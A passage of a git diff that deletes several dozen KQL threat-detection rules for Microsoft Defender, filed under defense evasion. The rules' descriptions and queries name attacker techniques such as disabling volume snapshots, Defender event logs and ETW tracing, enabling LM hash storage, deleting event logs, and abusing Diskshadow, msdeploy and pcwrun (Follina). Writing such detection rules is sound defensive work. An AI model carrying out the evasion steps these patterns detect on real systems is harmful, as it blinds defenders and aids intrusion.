-| where (ProcessCommandLine contains " -name IEHarden " and ProcessCommandLine contains " -value 0 ") or (ProcessCommandLine contains " -name DEPOff " and ProcessCommandLine contains " -value 1 ") or (ProcessCommandLine contains " -name DisableFirstRunCustomize " and ProcessCommandLine contains " -value 2 ")
\ No newline at end of file
diff --git a/Defense Evasion/Disabled_Volume_Snapshots.kql b/Defense Evasion/Disabled_Volume_Snapshots.kql
deleted file mode 100644
index 4531559c..00000000
--- a/Defense Evasion/Disabled_Volume_Snapshots.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/01/28
-// Level: high
-// Description: Detects commands that temporarily turn off Volume Snapshots
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\Services\\VSS\\Diag" and ProcessCommandLine contains "/d Disabled"
\ No newline at end of file
diff --git a/Defense Evasion/Disabled_Windows_Defender_Eventlog.kql b/Defense Evasion/Disabled_Windows_Defender_Eventlog.kql
deleted file mode 100644
index a8f2a083..00000000
--- a/Defense Evasion/Disabled_Windows_Defender_Eventlog.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/07/04
-// Level: high
-// Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Windows Defender/Operational\\Enabled"
\ No newline at end of file
diff --git a/Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql b/Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql
deleted file mode 100644
index 9f443b1a..00000000
--- a/Defense Evasion/Diskshadow_Script_Mode_-_Execution_From_Potential_Suspicious_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/15
-// Level: medium
-// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Users\\Public\\")
\ No newline at end of file
diff --git a/Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql b/Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql
deleted file mode 100644
index a628f79d..00000000
--- a/Defense Evasion/Diskshadow_Script_Mode_-_Uncommon_Script_Extension_Execution.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/09/15
-// Level: medium
-// Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension.
-Initial baselining of the allowed extension list is required.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe")) and (not(ProcessCommandLine contains ".txt"))
\ No newline at end of file
diff --git a/Defense Evasion/Dism_Remove_Online_Package.kql b/Defense Evasion/Dism_Remove_Online_Package.kql
deleted file mode 100644
index 78d6b348..00000000
--- a/Defense Evasion/Dism_Remove_Online_Package.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: medium
-// Description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "/Online" and ProcessCommandLine contains "/Disable-Feature") and FolderPath endswith "\\Dism.exe") or (FolderPath endswith "\\DismHost.exe" and (InitiatingProcessCommandLine contains "/Online" and InitiatingProcessCommandLine contains "/Disable-Feature"))
\ No newline at end of file
diff --git a/Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql b/Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql
deleted file mode 100644
index 62698c93..00000000
--- a/Defense Evasion/Displaying_Hidden_Files_Feature_Disabled.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/04/02
-// Level: medium
-// Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files.
-This technique is abused by several malware families to hide their files from normal users.
-
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden")
\ No newline at end of file
diff --git a/Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql b/Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql
deleted file mode 100644
index cf74575e..00000000
--- a/Defense Evasion/DllUnregisterServer_Function_Call_Via_Msiexec.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/04/24
-// Level: medium
-// Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function
-// Tags: attack.defense_evasion, attack.t1218.007
-DeviceProcessEvents
-| where ProcessCommandLine contains ".dll" and (ProcessCommandLine contains " -z " or ProcessCommandLine contains " /z ") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql b/Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql
deleted file mode 100644
index e3208d89..00000000
--- a/Defense Evasion/Dllhost.EXE_Execution_Anomaly.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/27
-// Level: high
-// Description: Detects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.
-// Tags: attack.defense_evasion, attack.t1055
-DeviceProcessEvents
-| where ((ProcessCommandLine in~ ("dllhost.exe", "dllhost")) and FolderPath endswith "\\dllhost.exe") and (not(isnull(ProcessCommandLine)))
\ No newline at end of file
diff --git a/Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql b/Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql
deleted file mode 100644
index 4a2e8091..00000000
--- a/Defense Evasion/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: bartblaze
-// Date: 2020/07/13
-// Level: medium
-// Description: Detects dllhost initiating a network connection to a non-local IP address.
-Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL.
-An initial baseline is recommended before deployment.
-
-// Tags: attack.defense_evasion, attack.t1218, attack.execution, attack.t1559.001
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\dllhost.exe" and (not(((ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "fc00::/7") or ipv4_is_in_range(RemoteIP, "fe80::/10")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24")))))
\ No newline at end of file
diff --git a/Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql b/Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql
deleted file mode 100644
index 8c857cd9..00000000
--- a/Defense Evasion/Drop_Binaries_Into_Spool_Drivers_Color_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/28
-// Level: medium
-// Description: Detects the creation of suspcious binary files inside the "\windows\system32\spool\drivers\color\" as seen in the blog referenced below
-// Tags: attack.defense_evasion
-DeviceFileEvents
-| where (FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".sys") and FolderPath startswith "C:\\Windows\\System32\\spool\\drivers\\color\\"
\ No newline at end of file
diff --git a/Defense Evasion/DumpMinitool_Execution.kql b/Defense Evasion/DumpMinitool_Execution.kql
deleted file mode 100644
index f7f7fd6a..00000000
--- a/Defense Evasion/DumpMinitool_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
-// Date: 2022/04/06
-// Level: medium
-// Description: Detects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"
-// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " Full" or ProcessCommandLine contains " Mini" or ProcessCommandLine contains " WithHeap") and ((FolderPath endswith "\\DumpMinitool.exe" or FolderPath endswith "\\DumpMinitool.x86.exe" or FolderPath endswith "\\DumpMinitool.arm64.exe") or (ProcessVersionInfoOriginalFileName in~ ("DumpMinitool.exe", "DumpMinitool.x86.exe", "DumpMinitool.arm64.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/DumpStack.log_Defender_Evasion.kql b/Defense Evasion/DumpStack.log_Defender_Evasion.kql
deleted file mode 100644
index a0a25999..00000000
--- a/Defense Evasion/DumpStack.log_Defender_Evasion.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/01/06
-// Level: critical
-// Description: Detects the use of the filename DumpStack.log to evade Microsoft Defender
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where FolderPath endswith "\\DumpStack.log" or ProcessCommandLine contains " -o DumpStack.log"
\ No newline at end of file
diff --git a/Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql b/Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql
deleted file mode 100644
index ce4a9118..00000000
--- a/Defense Evasion/Dynamic_.NET_Compilation_Via_Csc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2019/08/24
-// Level: medium
-// Description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
-// Tags: attack.defense_evasion, attack.t1027.004
-DeviceProcessEvents
-| where FolderPath endswith "\\csc.exe" and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Temporary Internet" or ProcessCommandLine contains "\\Windows\\Temp\\") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Pictures\\")) or ProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$") and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or (InitiatingProcessFolderPath in~ ("C:\\ProgramData\\chocolatey\\choco.exe", "C:\\ProgramData\\chocolatey\\tools\\shimgen.exe")) or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql b/Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql
deleted file mode 100644
index 030bd66d..00000000
--- a/Defense Evasion/Dynamic_CSharp_Compile_Artefact.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/01/09
-// Level: low
-// Description: When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
-Certain processes are not typically observed compiling C# code, but can do so without touching disk.
-This can be used to unpack a payload for execution
-
-// Tags: attack.defense_evasion, attack.t1027.004
-DeviceFileEvents
-| where FolderPath endswith ".cmdline"
\ No newline at end of file
diff --git a/Defense Evasion/ETW_Logging_Disabled_For_SCM.kql b/Defense Evasion/ETW_Logging_Disabled_For_SCM.kql
deleted file mode 100644
index 8766923b..00000000
--- a/Defense Evasion/ETW_Logging_Disabled_For_SCM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/09
-// Level: low
-// Description: Detects changes to the "TracingDisabled" key in order to disable ETW logging for services.exe (SCM)
-// Tags: attack.defense_evasion, attack.t1112, attack.t1562
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "Software\\Microsoft\\Windows NT\\CurrentVersion\\Tracing\\SCM\\Regular\\TracingDisabled"
\ No newline at end of file
diff --git a/Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql b/Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql
deleted file mode 100644
index ec62c30a..00000000
--- a/Defense Evasion/ETW_Logging_Disabled_For_rpcrt4.dll.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/09
-// Level: low
-// Description: Detects changes to the "ExtErrorInformation" key in order to disable ETW logging for rpcrt4.dll
-// Tags: attack.defense_evasion, attack.t1112, attack.t1562
-DeviceRegistryEvents
-| where (RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Microsoft\\Windows NT\\Rpc\\ExtErrorInformation"
\ No newline at end of file
diff --git a/Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql b/Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql
deleted file mode 100644
index 148555ce..00000000
--- a/Defense Evasion/ETW_Logging_Tamper_In_.NET_Processes.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: high
-// Description: Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
-// Tags: attack.defense_evasion, attack.t1562
-DeviceProcessEvents
-| where ProcessCommandLine contains "COMPlus_ETWEnabled" or ProcessCommandLine contains "COMPlus_ETWFlags"
\ No newline at end of file
diff --git a/Defense Evasion/EVTX_Created_In_Uncommon_Location.kql b/Defense Evasion/EVTX_Created_In_Uncommon_Location.kql
deleted file mode 100644
index ee7f0473..00000000
--- a/Defense Evasion/EVTX_Created_In_Uncommon_Location.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: D3F7A5105
-// Date: 2023/01/02
-// Level: medium
-// Description: Detects the creation of new files with the ".evtx" extension in non-common or non-standard location.
-This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.
-Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
-
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceFileEvents
-| where FolderPath endswith ".evtx" and (not(((FolderPath endswith "\\Windows\\System32\\winevt\\Logs\\" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows\\Containers\\BaseImages\\") or FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Enable_LM_Hash_Storage.kql b/Defense Evasion/Enable_LM_Hash_Storage.kql
deleted file mode 100644
index 2ae9a54e..00000000
--- a/Defense Evasion/Enable_LM_Hash_Storage.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/12/15
-// Level: high
-// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
-By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\NoLMHash"
\ No newline at end of file
diff --git a/Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql b/Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql
deleted file mode 100644
index 3d5fa187..00000000
--- a/Defense Evasion/Enable_LM_Hash_Storage_-_ProcCreation.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/12/15
-// Level: high
-// Description: Detects changes to the "NoLMHash" registry value in order to allow Windows to store LM Hashes.
-By setting this registry value to "0" (DWORD), Windows will be allowed to store a LAN manager hash of your password in Active Directory and local SAM databases.
-
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "NoLMHash" and ProcessCommandLine contains " 0"
\ No newline at end of file
diff --git a/Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql b/Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql
deleted file mode 100644
index d6abdc89..00000000
--- a/Defense Evasion/Enable_Local_Manifest_Installation_With_Winget.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/17
-// Level: medium
-// Description: Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\AppInstaller\\EnableLocalManifestFiles"
\ No newline at end of file
diff --git a/Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql b/Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql
deleted file mode 100644
index 771adbd0..00000000
--- a/Defense Evasion/Enable_Remote_Connection_Between_Anonymous_Computer_-_AllowAnonymousCallback.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/11/03
-// Level: medium
-// Description: Detects enabling of the "AllowAnonymousCallback" registry value, which allows a remote connection between computers that do not have a trust relationship.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\WBEM\\CIMOM\\AllowAnonymousCallback"
\ No newline at end of file
diff --git a/Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql b/Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql
deleted file mode 100644
index 37c43d0b..00000000
--- a/Defense Evasion/Enabling_COR_Profiler_Environment_Variables.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research), Jimmy Bayne (@bohops)
-// Date: 2020/09/10
-// Level: medium
-// Description: Detects .NET Framework CLR and .NET Core CLR "cor_enable_profiling" and "cor_profiler" variables being set and configured.
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.012
-DeviceRegistryEvents
-| where (RegistryKey endswith "\\COR_ENABLE_PROFILING" or RegistryKey endswith "\\COR_PROFILER" or RegistryKey endswith "\\CORECLR_ENABLE_PROFILING") or RegistryKey contains "\\CORECLR_PROFILER_PATH"
\ No newline at end of file
diff --git a/Defense Evasion/EventLog_EVTX_File_Deleted.kql b/Defense Evasion/EventLog_EVTX_File_Deleted.kql
deleted file mode 100644
index 2e9420ac..00000000
--- a/Defense Evasion/EventLog_EVTX_File_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/15
-// Level: medium
-// Description: Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070
-DeviceFileEvents
-| where FolderPath endswith ".evtx" and FolderPath startswith "C:\\Windows\\System32\\winevt\\Logs\\"
\ No newline at end of file
diff --git a/Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql b/Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql
deleted file mode 100644
index a124be21..00000000
--- a/Defense Evasion/Exchange_PowerShell_Cmdlet_History_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/26
-// Level: high
-// Description: Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070
-DeviceFileEvents
-| where FolderPath contains "_Cmdlet_" and FolderPath startswith "\\Logging\\CmdletInfra\\LocalPowerShell\\Cmdlet\\"
\ No newline at end of file
diff --git a/Defense Evasion/Execute_Code_with_Pester.bat.kql b/Defense Evasion/Execute_Code_with_Pester.bat.kql
deleted file mode 100644
index 0676e78a..00000000
--- a/Defense Evasion/Execute_Code_with_Pester.bat.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/08
-// Level: medium
-// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "Pester" and ProcessCommandLine contains "Get-Help") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "pester" and ProcessCommandLine contains ";") and FolderPath endswith "\\cmd.exe") and (ProcessCommandLine contains "help" or ProcessCommandLine contains "?"))
\ No newline at end of file
diff --git a/Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql b/Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql
deleted file mode 100644
index 7a116895..00000000
--- a/Defense Evasion/Execute_Code_with_Pester.bat_as_Parent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/20
-// Level: medium
-// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "{ Invoke-Pester -EnableExit ;" or InitiatingProcessCommandLine contains "{ Get-Help \"") and (InitiatingProcessCommandLine contains "\\WindowsPowerShell\\Modules\\Pester\\" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Execute_Files_with_Msdeploy.exe.kql b/Defense Evasion/Execute_Files_with_Msdeploy.exe.kql
deleted file mode 100644
index b557d443..00000000
--- a/Defense Evasion/Execute_Files_with_Msdeploy.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community
-// Date: 2020/10/18
-// Level: medium
-// Description: Detects file execution using the msdeploy.exe lolbin
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "verb:sync" and ProcessCommandLine contains "-source:RunCommand" and ProcessCommandLine contains "-dest:runCommand") and FolderPath endswith "\\msdeploy.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Execute_From_Alternate_Data_Streams.kql b/Defense Evasion/Execute_From_Alternate_Data_Streams.kql
deleted file mode 100644
index 39de86ed..00000000
--- a/Defense Evasion/Execute_From_Alternate_Data_Streams.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/09/01
-// Level: medium
-// Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "txt:" and ((ProcessCommandLine contains "esentutl " and ProcessCommandLine contains " /y " and ProcessCommandLine contains " /d " and ProcessCommandLine contains " /o ") or (ProcessCommandLine contains "makecab " and ProcessCommandLine contains ".cab") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains " export ") or (ProcessCommandLine contains "regedit " and ProcessCommandLine contains " /E ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > "))
\ No newline at end of file
diff --git a/Defense Evasion/Execute_MSDT_Via_Answer_File.kql b/Defense Evasion/Execute_MSDT_Via_Answer_File.kql
deleted file mode 100644
index 3ce729d9..00000000
--- a/Defense Evasion/Execute_MSDT_Via_Answer_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/13
-// Level: high
-// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af ") and (ProcessCommandLine contains "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml" and FolderPath endswith "\\msdt.exe")) and (not(InitiatingProcessFolderPath endswith "\\pcwrun.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql b/Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql
deleted file mode 100644
index b385a85e..00000000
--- a/Defense Evasion/Execute_Pcwrun.EXE_To_Leverage_Follina.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/13
-// Level: high
-// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "../" and FolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql b/Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql
deleted file mode 100644
index 03ab5746..00000000
--- a/Defense Evasion/Execution_DLL_of_Choice_Using_WAB.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: oscd.community, Natalia Shornikova
-// Date: 2020/10/13
-// Level: high
-// Description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Software\\Microsoft\\WAB\\DLLPath" and (not(RegistryValueData =~ "%CommonProgramFiles%\\System\\wab32.dll"))
\ No newline at end of file
diff --git a/Defense Evasion/Execution_Of_Non-Existing_File.kql b/Defense Evasion/Execution_Of_Non-Existing_File.kql
deleted file mode 100644
index 21d8dc22..00000000
--- a/Defense Evasion/Execution_Of_Non-Existing_File.kql
